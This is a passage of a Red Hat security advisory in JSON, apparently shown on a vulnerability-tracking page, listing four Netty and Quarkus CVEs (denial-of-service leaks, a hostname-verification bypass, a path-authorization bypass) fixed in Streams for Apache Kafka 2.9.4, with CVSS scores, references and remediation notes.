"text": "This is an Important denial of service flaw in netty-codec-http2, affecting Red Hat products that utilize HTTP/2 communication with decompression. A remote attacker can exploit a resource leak in the `DelegatingDecompressorFrameListener` by sending malformed HTTP/2 frames, potentially leading to an Out Of Memory Error and causing the Java Virtual Machine to terminate. This could disrupt service availability in affected deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48043"
},
{
"category": "external",
"summary": "RHBZ#2488442",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488442"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48043",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48043"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48043",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48043"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-c2gf-v879-257j",
"url": "https://github.com/netty/netty/security/advisories/GHSA-c2gf-v879-257j"
}
],
"release_date": "2026-06-12T14:39:52.498000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty-codec-http2: netty-codec-http2: Denial of Service due to resource leak"
},
{
"cve": "CVE-2026-48059",
"cwe": {
"id": "CWE-1286",
"name": "Improper Validation of Syntactic Correctness of Input"
},
"discovery_date": "2026-06-12T16:02:40.032749+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488437"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Netty HAProxy PROXY protocol v2 codec. A remote attacker can exploit this vulnerability by sending a specially crafted HAProxy PROXY protocol v2 header with nested `PP2_TYPE_SSL` type-length-value (TLV) records. This can lead to a memory leak, causing the underlying cumulation buffer to remain permanently pinned and potentially resulting in a Denial of Service (DoS) due to resource exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-codec-haproxy: Netty HAProxy PROXY protocol v2 codec: Denial of Service via memory leak from crafted PROXY protocol headers",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important flaw in the Netty HAProxy PROXY protocol v2 codec, which can lead to a denial of service. A remote attacker can trigger a memory leak by sending a specially crafted HAProxy PROXY protocol v2 header with deeply nested SSL TLV records, causing resource exhaustion in affected Red Hat products that utilize this codec.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48059"
},
{
"category": "external",
"summary": "RHBZ#2488437",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488437"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48059",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48059"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48059",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48059"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-h2qv-fj59-j46j",
"url": "https://github.com/netty/netty/security/advisories/GHSA-h2qv-fj59-j46j"
}
],
"release_date": "2026-06-12T14:42:44.677000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty-codec-haproxy: Netty HAProxy PROXY protocol v2 codec: Denial of Service via memory leak from crafted PROXY protocol headers"
},
{
"cve": "CVE-2026-50010",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-06-12T16:02:13.735675+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488429"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty, a network application framework. This vulnerability allows a remote attacker to bypass hostname verification due to improper handling of user-supplied trust managers. When a client is configured with a plain X.509 Trust Manager (X509TrustManager), it fails to perform necessary hostname checks, enabling an attacker to impersonate a legitimate server. This could lead to sensitive information disclosure or man-in-the-middle attacks.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-handler: Netty: Improper trust manager handling leads to hostname verification bypass",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important flaw in Netty that affects Red Hat products utilizing the `netty-handler` component, including various Red Hat AMQ, Enterprise Application Platform, and OpenShift offerings. The vulnerability arises when a Netty client is configured with a plain X.509 Trust Manager, leading to a bypass of hostname verification. This oversight allows a remote attacker to perform man-in-the-middle attacks by impersonating a legitimate server, potentially compromising sensitive data.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-50010"
},
{
"category": "external",
"summary": "RHBZ#2488429",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488429"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-50010",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-50010"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-50010",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50010"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-c653-97m9-rcg9",
"url": "https://github.com/netty/netty/security/advisories/GHSA-c653-97m9-rcg9"
}
],
"release_date": "2026-06-12T14:50:43.151000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty-handler: Netty: Improper trust manager handling leads to hostname verification bypass"
},
{
"cve": "CVE-2026-50559",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-06-09T10:55:32.426000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2486959"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Quarkus. A remote attacker could bypass HTTP path-based authorization policies by using specially crafted encoded semicolons, slashes, or backslashes in HTTP requests. This could allow unauthorized access to protected static resources, leading to information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "io.quarkus/quarkus-vertx-http: Quarkus: Authorization bypass in HTTP path-based policies via encoded characters",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important flaw in Quarkus where HTTP path-based authorization policies can be bypassed by a remote attacker. Specially crafted HTTP requests containing encoded semicolons, slashes, or backslashes can circumvent security controls, allowing unauthorized access to protected static resources and leading to information disclosure. This is critical in deployments where Quarkus applications serve sensitive static content and rely solely on path-based authorization.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-50559"
},
{
"category": "external",
"summary": "RHBZ#2486959",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2486959"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-50559",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-50559"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-50559",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50559"
},
{
"category": "external",
"summary": "https://github.com/quarkusio/quarkus/security/advisories/GHSA-qcxp-gm7m-4j5v",
"url": "https://github.com/quarkusio/quarkus/security/advisories/GHSA-qcxp-gm7m-4j5v"
}
],
"release_date": "2026-06-17T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "io.quarkus/quarkus-vertx-http: Quarkus: Authorization bypass in HTTP path-based policies via encoded characters"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.